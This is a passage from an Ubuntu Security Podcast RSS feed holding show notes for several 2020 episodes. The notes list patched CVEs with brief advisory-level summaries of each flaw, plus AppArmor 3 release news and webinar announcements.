<li><a href="https://ubuntu.com/security/CVE-2020-3812">CVE-2020-3812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3811">CVE-2020-3811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2005-1515">CVE-2005-1515</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2005-1514">CVE-2005-1514</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2005-1513">CVE-2005-1513</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="apparmor-3-dot-0-release">AppArmor 3.0 Release</h3>
<ul>
<li><a href="https://gitlab.com/apparmor/apparmor/-/releases/v3.0.0">https://gitlab.com/apparmor/apparmor/-/releases/v3.0.0</a></li>
<li><a href="https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.0">https://gitlab.com/apparmor/apparmor/-/wikis/Release_Notes_3.0</a></li>
</ul>
<h3 id="ubuntu-security-related-webinars">Ubuntu Security Related Webinars</h3>
<h4 id="fips-certification-and-cis-compliance-with-ubuntu-webinar">FIPS certification and CIS compliance with Ubuntu Webinar</h4>
<ul>
<li><!-- raw HTML omitted --><!-- raw HTML omitted -->&lt;2020-10-01 Thu&gt;<!-- raw HTML omitted --><!-- raw HTML omitted --></li>
<li>More on the Ubuntu FIPS certification for cryptographic modules in Ubuntu
18.04 LTS and 16.04 LTS and the Ubuntu FIPS public cloud images</li>
<li>The difference between FIPS certified and FIPS compliant modules</li>
<li>More on compliance benchmark documentation for Ubuntu CIS compliance</li>
<li>How to quickly harden Ubuntu systems and easily view which rules your
systems are not compliant with using the CIS automation tooling from
Canonical [demo]</li>
<li>Presented by Vineetha Kamatha (Security Engineering Manager), Shaun
Murphy (Public Cloud Sr Product Manager) &amp; Lech Sandecki (Product
Manager)</li>
<li><a href="https://www.brighttalk.com/webcast/6793/432536/fips-certification-and-cis-compliance-with-ubuntu">https://www.brighttalk.com/webcast/6793/432536/fips-certification-and-cis-compliance-with-ubuntu</a></li>
</ul>
<h4 id="best-practices-for-securing-open-source-webinar">Best Practices for Securing Open Source Webinar</h4>
<ul>
<li><!-- raw HTML omitted --><!-- raw HTML omitted -->&lt;2020-10-08 Thu&gt;<!-- raw HTML omitted --><!-- raw HTML omitted --></li>
<li><a href="https://www.brighttalk.com/webcast/6793/440071">https://www.brighttalk.com/webcast/6793/440071</a></li>
<li>Presented by me :)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E092.mp3" length="10987011" type="audio/mpeg" /><itunes:duration>11:26</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 91
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-91/</link>
          <pubDate>Fri, 18 Sep 2020 16:51:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>c003dcca038c1bcb46cecbc475409cbd6cf023facdeb870cd2c4df0db1b3d43d28b040b2a4061fe027bd49a5e4157ac89f980cc9e82afb24eaad191d9c509b86</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 91</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at security updates for GUPnP, OpenJPEG, bsdiff and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at security updates for GUPnP, OpenJPEG, bsdiff and more.</itunes:summary>
        <description>This week we look at security updates for GUPnP, OpenJPEG, bsdiff and more.</description>
        <googleplay:description>This week we look at security updates for GUPnP, OpenJPEG, bsdiff and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for GUPnP, OpenJPEG, bsdiff and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>24 unique CVEs addressed</p>
<h3 id="usn-4488-2-x-dot-org-x-server-vulnerabilities-00-31">[<a href="https://usn.ubuntu.com/4488-2/">USN-4488-2</a>] X.Org X Server vulnerabilities [00:31]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14345">CVE-2020-14345</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14362">CVE-2020-14362</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14361">CVE-2020-14361</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14347">CVE-2020-14347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14346">CVE-2020-14346</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-90/">Episode 90</a></li>
</ul>
<h3 id="lsn-0071-1-linux-kernel-vulnerability-00-50">[<a href="https://usn.ubuntu.com/lsn/0071-1/">LSN-0071-1</a>] Linux kernel vulnerability [00:50]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14386">CVE-2020-14386</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-90/">Episode 90</a> (AF_PACKET OOB write - crash / code exec)</li>
<li>Also affects Focal (20.04 LTS) but livepatch is still being prepared</li>
</ul>
<h3 id="usn-4494-1-gupnp-vulnerability-01-29">[<a href="https://usn.ubuntu.com/4494-1/">USN-4494-1</a>] GUPnP vulnerability [01:29]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12695">CVE-2020-12695</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>GNOME UPnP impl, used by Rygel for media sharing on GNOME (standard
Ubuntu) desktop and many other applications</li>
<li><a href="https://callstranger.com/">Callstranger Vulnerability</a> - vuln in UPnP protocol - callback header in
UPnP SUBSCRIBE can contain arbitrary delivery URL - so this could be on a
different network segment than the event subscription URL - so you can
SUBSCRIBE to events and supply one or more URLs for delivery of the
messages. Can then make this point anywhere and so can get the device to
send HTTP traffic to any arbitrary destination - and so can be used for
data exfil or DDoS attacks etc. Fixed to check the destination host is
either a link-local address or the address mask matches - either way,
check is on the same network segment.</li>
</ul>
<h3 id="usn-4495-1-apache-log4j-vulnerability-03-21">[<a href="https://usn.ubuntu.com/4495-1/">USN-4495-1</a>] Apache Log4j vulnerability [03:21]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17571">CVE-2019-17571</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly deserialise data - so if is listening to untrusted log
data from the network could be exploited to run arbitrary code</li>
</ul>
<h3 id="usn-4496-1-apache-xml-rpc-vulnerability-03-42">[<a href="https://usn.ubuntu.com/4496-1/">USN-4496-1</a>] Apache XML-RPC vulnerability [03:42]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17570">CVE-2019-17570</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Similarly failed to properly deserialize data - a malicious XML-RPC
server could cause code execution on the client as a result</li>
</ul>
<h3 id="usn-4497-1-openjpeg-vulnerabilities-03-58">[<a href="https://usn.ubuntu.com/4497-1/">USN-4497-1</a>] OpenJPEG vulnerabilities [03:58]</h3>
<ul>
<li>7 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-12973">CVE-2019-12973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15389">CVE-2020-15389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8112">CVE-2020-8112</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6851">CVE-2020-6851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-21010">CVE-2018-21010</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20847">CVE-2018-20847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-9112">CVE-2016-9112</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Usual mix of memory safety issues in image handling libraries written in
C - DoS, RCE etc via crafted image data</li>
</ul>
<h3 id="usn-4499-1-milkytracker-vulnerabilities-04-27">[<a href="https://usn.ubuntu.com/4499-1/">USN-4499-1</a>] MilkyTracker vulnerabilities [04:27]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14497">CVE-2019-14497</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14496">CVE-2019-14496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14464">CVE-2019-14464</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to properly validate files - 2 different heap and 1 stack based
buffer overflows - RCE if loading untrusted files</li>
</ul>
<h3 id="usn-4498-1-loofah-vulnerability-04-52">[<a href="https://usn.ubuntu.com/4498-1/">USN-4498-1</a>] Loofah vulnerability [04:52]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15587">CVE-2019-15587</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ruby module for manipulation and transformation of HTML/XML etc</li>
<li>Possible XSS - failed to sanitize JS when handling crafted SVG</li>
</ul>
<h3 id="usn-4500-1-bsdiff-vulnerabilities-05-16">[<a href="https://usn.ubuntu.com/4500-1/">USN-4500-1</a>] bsdiff vulnerabilities [05:16]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2014-9862">CVE-2014-9862</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>(Oldest CVE of the week!)</li>
<li>Failed to properly validate input patch file -&gt; integer overflow -&gt; heap
based buffer overflow -&gt; code exec / DoS</li>
</ul>
<h3 id="usn-4501-1-luajit-vulnerability-05-40">[<a href="https://usn.ubuntu.com/4501-1/">USN-4501-1</a>] LuaJIT vulnerability [05:40]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15890">CVE-2020-15890</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read -&gt; crash / info leak</li>
</ul>
<h3 id="usn-4502-1-websocket-extensions-vulnerability-05-49">[<a href="https://usn.ubuntu.com/4502-1/">USN-4502-1</a>] websocket-extensions vulnerability [05:49]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7663">CVE-2020-7663</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>ruby websockets extension - used regex with backtracking to properly
parse headers, could be sent crafted input which is very computationally
intensive to parse as a result -&gt; CPU based DoS</li>
</ul>
<h3 id="usn-4503-1-perl-dbi-module-vulnerability-06-21">[<a href="https://usn.ubuntu.com/4503-1/">USN-4503-1</a>] Perl DBI module vulnerability [06:21]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14392">CVE-2020-14392</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Perl DB interface - underlying code would potentially allocate the stack
and hence result in invalid pointers to object that were previously on
the stack - could be manipulated by a remote user to result in memory
corruption etc -&gt; crash</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E091.mp3" length="7799236" type="audio/mpeg" /><itunes:duration>08:07</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 90
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-90/</link>
          <pubDate>Fri, 11 Sep 2020 15:26:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>3ae0b20ef4b38177e2d75e9f68ae9349990e62570dcf63a6ec394a68491e3b6d70560d3c47c2bfc6dcccb88d7c04edde4733c242d787e7c6700b730febf14622</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 90</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at security updates for the X server, the Linux kernel
  and GnuTLS plus we preview the upcoming AppArmor3 release that is slated
  for Ubuntu 20.10 (Groovy Gorilla).
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at security updates for the X server, the Linux kernel
  and GnuTLS plus we preview the upcoming AppArmor3 release that is slated
  for Ubuntu 20.10 (Groovy Gorilla).
  </itunes:summary>
        <description>  This week we look at security updates for the X server, the Linux kernel
  and GnuTLS plus we preview the upcoming AppArmor3 release that is slated
  for Ubuntu 20.10 (Groovy Gorilla).
  </description>
        <googleplay:description>  This week we look at security updates for the X server, the Linux kernel
  and GnuTLS plus we preview the upcoming AppArmor3 release that is slated
  for Ubuntu 20.10 (Groovy Gorilla).
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for the X server, the Linux kernel
and GnuTLS plus we preview the upcoming AppArmor3 release that is slated
for Ubuntu 20.10 (Groovy Gorilla).</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>20 unique CVEs addressed</p>
<h3 id="usn-4487-1-usn-4487-2-libx11-vulnerabilities-00-58">[<a href="https://usn.ubuntu.com/4487-1/">USN-4487-1</a>, <a href="https://usn.ubuntu.com/4487-2/">USN-4487-2</a>] libx11 vulnerabilities [00:58]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14363">CVE-2020-14363</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14344">CVE-2020-14344</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 privilege escalation attacks
<ul>
<li>integer overflow -&gt; double free -&gt; memory corruption</li>
<li>integer overflow -&gt; heap buffer overflow</li>
<li>privilege escalation may be possible since in both cases could cause
arbitrary code exec with a binary that is using libX11 and running with
root privileges (setuid / sudo etc) - this is why we often advise don&rsquo;t
run graphical applications via sudo etc</li>
</ul>
</li>
</ul>
<h3 id="usn-4488-1-usn-4490-1-x-dot-org-x-server-vulnerabilities-02-29">[<a href="https://usn.ubuntu.com/4488-1/">USN-4488-1</a>, <a href="https://usn.ubuntu.com/4490-1/">USN-4490-1</a>] X.Org X Server vulnerabilities [02:29]</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14362">CVE-2020-14362</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14361">CVE-2020-14361</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14347">CVE-2020-14347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14346">CVE-2020-14346</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14345">CVE-2020-14345</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory corruption vulnerabilities all discovered by Jan-Niklas
Sohn - on some older releases (xenial and earlier) X server runs as root</li>
</ul>
<h3 id="usn-4449-2-apport-vulnerabilities-03-28">[<a href="https://usn.ubuntu.com/4449-2/">USN-4449-2</a>] Apport vulnerabilities [03:28]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15702">CVE-2020-15702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15701">CVE-2020-15701</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11936">CVE-2020-11936</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-85/">Episode 85</a></li>
</ul>
<h3 id="usn-4474-2-firefox-regressions-03-38">[<a href="https://usn.ubuntu.com/4474-2/">USN-4474-2</a>] Firefox regressions [03:38]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15668">CVE-2020-15668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6829">CVE-2020-6829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12401">CVE-2020-12401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12400">CVE-2020-12400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15670">CVE-2020-15670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15666">CVE-2020-15666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15665">CVE-2020-15665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15664">CVE-2020-15664</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-89/">Episode 89</a></li>
<li>80.0.1 - upstream release to fix regressions in 80.0 release -&gt; crashes
on GPU resets, WebGL rendering issues, performance issue in processing CA
certs &amp;c</li>
</ul>
<h3 id="usn-4489-1-linux-kernel-vulnerability-04-09">[<a href="https://usn.ubuntu.com/4489-1/">USN-4489-1</a>] Linux kernel vulnerability [04:09]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14386">CVE-2020-14386</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>AF_PACKET (layer 2) socket did not perform bounds checks in some places -
requires CAP_NET_RAW or root - BUT can be root in a user namespace and
these are enabled by default in Ubuntu and other Linux distros -&gt; can
disable by sysctl `kernel.unprivileged_userns_clone=0`</li>
</ul>
<h3 id="usn-4491-1-gnutls-vulnerability-06-01">[<a href="https://usn.ubuntu.com/4491-1/">USN-4491-1</a>] GnuTLS vulnerability [06:01]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-24659">CVE-2020-24659</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Malicious server can trigger a NULL ptr deref in client during TLS 1.3
negotiation - DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="apparmor3-slated-for-ubuntu-20-dot-10-06-32">AppArmor3 slated for Ubuntu 20.10 [06:32]</h3>
<ul>
<li>Beta version of AppArmor3 is being prepared for Ubuntu 20.10 Groovy
Gorilla - should land in -proposed next week and then main soon after</li>
<li>Provides ABI feature pinning - so upgrading to kernels with newer
additional features will not break existing profiles</li>
<li>Rewrites of a number of tools into different languages to make their use
and packaging easier</li>
<li>Support for new kernel features such as v8 ABI network socket rules,
xattr attachment conditionals, PERFMON and BPF capabilities</li>
<li>Improved compilar warnings and semantic checks</li>
<li>Improved support for kernels that support LSM stacking</li>
<li>Profile modes - enforce (default), kill and unconfined</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E090.mp3" length="11004565" type="audio/mpeg" /><itunes:duration>11:27</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 89
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-89/</link>
          <pubDate>Thu, 03 Sep 2020 17:20:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>eaad6772979ced6825b11a497941a1b76c5a1d65b4e2d6d684aac06554cc4c3207588d025bcf438c5eb5cce2a1c2cf137f747927da22b487e5833ddb1393d480</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 89</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we farewell Joe McManus plus we look at security updates for
  Firefox, Chrony, Squid, Django, the Linux kernel and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we farewell Joe McManus plus we look at security updates for
  Firefox, Chrony, Squid, Django, the Linux kernel and more.
  </itunes:summary>
        <description>  This week we farewell Joe McManus plus we look at security updates for
  Firefox, Chrony, Squid, Django, the Linux kernel and more.
  </description>
        <googleplay:description>  This week we farewell Joe McManus plus we look at security updates for
  Firefox, Chrony, Squid, Django, the Linux kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we farewell Joe McManus plus we look at security updates for
Firefox, Chrony, Squid, Django, the Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>59 unique CVEs addressed</p>
<h3 id="usn-4473-1-libmysofa-vulnerabilities-01-01">[<a href="https://usn.ubuntu.com/4473-1/">USN-4473-1</a>] libmysofa vulnerabilities [01:01]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16095">CVE-2019-16095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16094">CVE-2019-16094</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16093">CVE-2019-16093</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16092">CVE-2019-16092</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16091">CVE-2019-16091</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB, NULL ptr deref, heap buffer overflow etc -&gt; DoS</li>
</ul>
<h3 id="usn-4474-1-firefox-vulnerabilities-01-30">[<a href="https://usn.ubuntu.com/4474-1/">USN-4474-1</a>] Firefox vulnerabilities [01:30]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15668">CVE-2020-15668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6829">CVE-2020-6829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12401">CVE-2020-12401</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12400">CVE-2020-12400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15670">CVE-2020-15670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15666">CVE-2020-15666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15665">CVE-2020-15665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15664">CVE-2020-15664</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>80.0</li>
<li>Attacker controlled website -&gt; DoS, install malicious extension, spoof
URL bar, leak sensitive info across origins, RCE etc</li>
<li>NSS side-channel attacks etc</li>
<li>Race condition when importing a cert into the trust store (unspec impact)</li>
</ul>
<h3 id="usn-4446-2-squid-regression-02-31">[<a href="https://usn.ubuntu.com/4446-2/">USN-4446-2</a>] Squid regression [02:31]</h3>
<ul>
<li>4 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18676">CVE-2019-18676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12524">CVE-2019-12524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12523">CVE-2019-12523</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12520">CVE-2019-12520</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Regression in recent squid update would cause issues if using icap or
ecap protocols to do content adaptation</li>
</ul>
<h3 id="usn-4475-1-chrony-vulnerability-02-51">[<a href="https://usn.ubuntu.com/4475-1/">USN-4475-1</a>] Chrony vulnerability [02:51]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14367">CVE-2020-14367</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>pid file is created as root before drops privileges and was susceptible
to a symlink attack -&gt; could be used to overwrite arbitrary files on the
system</li>
</ul>
<h3 id="usn-4476-1-nss-vulnerability-03-45">[<a href="https://usn.ubuntu.com/4476-1/">USN-4476-1</a>] NSS vulnerability [03:45]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12403">CVE-2020-12403</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read for CHACHA20 decryption with undersized tag</li>
</ul>
<h3 id="usn-4477-1-squid-vulnerabilities">[<a href="https://usn.ubuntu.com/4477-1/">USN-4477-1</a>] Squid vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-24606">CVE-2020-24606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15811">CVE-2020-15811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15810">CVE-2020-15810</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP request smuggling</li>
</ul>
<h3 id="usn-4478-1-python-rsa-vulnerability-04-15">[<a href="https://usn.ubuntu.com/4478-1/">USN-4478-1</a>] Python-RSA vulnerability [04:15]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-13757">CVE-2020-13757</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Ignores leading NUL/zero byte in decryption of ciphertext - fixed to
check length matches block size</li>
</ul>
<h3 id="usn-4479-1-django-vulnerabilities-04-40">[<a href="https://usn.ubuntu.com/4479-1/">USN-4479-1</a>] Django vulnerabilities [04:40]</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-24584">CVE-2020-24584</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24583">CVE-2020-24583</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Incorrect handling of permissions on directories in caches - caused by a
behavioural change in python 3.7 - so only affects Python Django when
